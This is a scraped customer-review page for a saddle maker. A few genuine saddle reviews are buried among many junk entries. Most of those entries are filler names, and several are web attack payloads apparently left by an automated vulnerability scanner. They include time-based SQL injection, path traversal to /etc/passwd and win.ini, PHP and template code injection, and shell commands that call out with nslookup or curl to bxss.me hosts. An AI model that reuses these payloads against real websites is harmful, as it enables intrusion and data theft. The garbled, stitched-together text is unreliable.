XcwJRDFY
    
|
products.aspx/.
    
|
fnfOzvSR
    
|
Jessica
     I love this saddle! It enables me to feel my horse more and does not weigh a ton like my other saddle. My horse has a nice even sweat when I'm done and there is no rubbing or irritation noted. |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
     bfgx7978��z1��z2a�bcxhjl7978 |
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFYKWESG5rg
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
KHiMojrU')) OR 864=(SELECT 864 FROM PG_SLEEP(15))-- |
XcwJRDFY
    
|
gethostbyname(lc('hitlz'.'cdszybfj0918b.bxss.me.')
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
c:/windows/win.ini
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
<% response.write(9361469*9127676) %>
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
(nslookup -q=cname hitonwtiomeune41e8.bxss.me||cur
    
|
fnfOzvSR
    
dvnPpZ9a'); waitfor delay '0:0:15' -- |
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
Linda
     Bought one of these saddles in 2012 because I have back problems. I really love this saddle. It is well made and very, very comfortable. Since it sits down on the horse's back there is less shock on my spine from a hard tree, like most saddles. |
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
sadgyL8O
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
'"()&% |
XcwJRDFY
    
|
products.aspx
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
-1)); waitfor delay '0:0:15' -- |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ";print(md5(31337));$a=" |
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
-1' OR 2+623-623-1=0+0+0+1 or 'xsPwmCcg'='
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     '" |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
products.aspx
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
/../../../../../../../../../../windows/system32/BI
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     dfb[[${98991*97996}]]xca |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
-1 waitfor delay '0:0:15' -- |
fnfOzvSR
    
-1 OR 110=(SELECT 110 FROM PG_SLEEP(15))-- |
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
9992653 |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
file:///etc/passwd
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
     -1 OR 2+955-955-1=0+0+0+1 -- |
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
     hilasontackshop.com |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
Zaiyah
     Very valid, pithy, sucincct, and on point. WD. |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z |
-1 OR 2+460-460-1=0+0+0+1
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
    
|
XcwJRDFY
     ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
     -1" OR 2+937-937-1=0+0+0+1 -- |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
     ../../../../../../../../../../../../../../etc/passwd |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSRMrtIOiG3'; waitfor delay '0:0:15' --
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
"+response.write(9361469*9127676)+"
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     bxss.me/t/xss.html?%00 |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
"||sleep(27*1000)*pymfnc||" |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
${@print(md5(31337))}\
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
Kisha
     In reference to Hilason having some bad reviews regarding their customer service? They were great! Took care of a small issue I had with saddle fit, they were quick and responsive!! |
XcwJRDFY
    
|
fnfOzvSR
    
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' |
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSRitIIfVRU
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     'A'.concat(70-3).concat(22*4).concat(105).concat(80).concat(114).concat(65)+(require'socket'
Socket.gethostbyname('hitbc'+'wnheibct5ae42.bxss.me.')[3].to_s) |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     (nslookup -q=cname hittiebtzgpcxbb5e7.bxss.me||curl hittiebtzgpcxbb5e7.bxss.me)) |
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
     -1' OR 2+261-261-1=0+0+0+1 -- |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY-1); waitfor delay '0:0:15' --
    
|
Mickey
     An answer from an erxpet! Thanks for contributing. |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFYXqSV2R2J') OR 657=(SELECT 657 FROM PG_SLEE
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
+response.write(9634081*9386453)'
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     &(nslookup${IFS}-q${IFS}cname${IFS}hitqjbsvcomws4e1f0.bxss.me||curl${IFS}hitqjbsvcomws4e1f0.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqjbsvcomws4e1f0.bxss.me||curl${IFS}hitqjbsvcomws4e1f0.bxss.me)&`' |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
+response.write(9361469*9127676)'
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     '+response.write(9173429*9074816)+' |
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ${@print(md5(31337))} |
XcwJRDFY
     dfb{{98991*97996}}xca |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     yXfSBMA6: PO5dK5Iv |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
     bfg3536<s1﹥s2ʺs3ʹhjl3536 |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR7BgFbRkU')); waitfor delay '0:0:15' --
    
|
XcwJRDFY
    
|
fnfOzvSR
    
4JAdounP')) OR 932=(SELECT 932 FROM PG_SLEEP(15))-- |
XcwJRDFY
    
JFhGac2s'); waitfor delay '0:0:15' -- |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
echo updtcq$()\ iesvxz\nz^xyu||a #' &echo updtcq$(
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     `(nslookup -q=cname hitzoiofjikirded2e.bxss.me||curl hitzoiofjikirded2e.bxss.me)` |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
����%2527%2522\'\" |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
-1)) OR 394=(SELECT 394 FROM PG_SLEEP(15))-- |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSRLnpKzFSt')) OR 332=(SELECT 332 FROM PG_SLE
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
../../../../../../../../../../../../../../windows/
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
PgMIQXa8 |
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFYwjg4lQog')); waitfor delay '0:0:15' --
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
fnfOzvSR
    
|
XcwJRDFY
    
|
XcwJRDFY
     12345'"\'\");|]* {
< |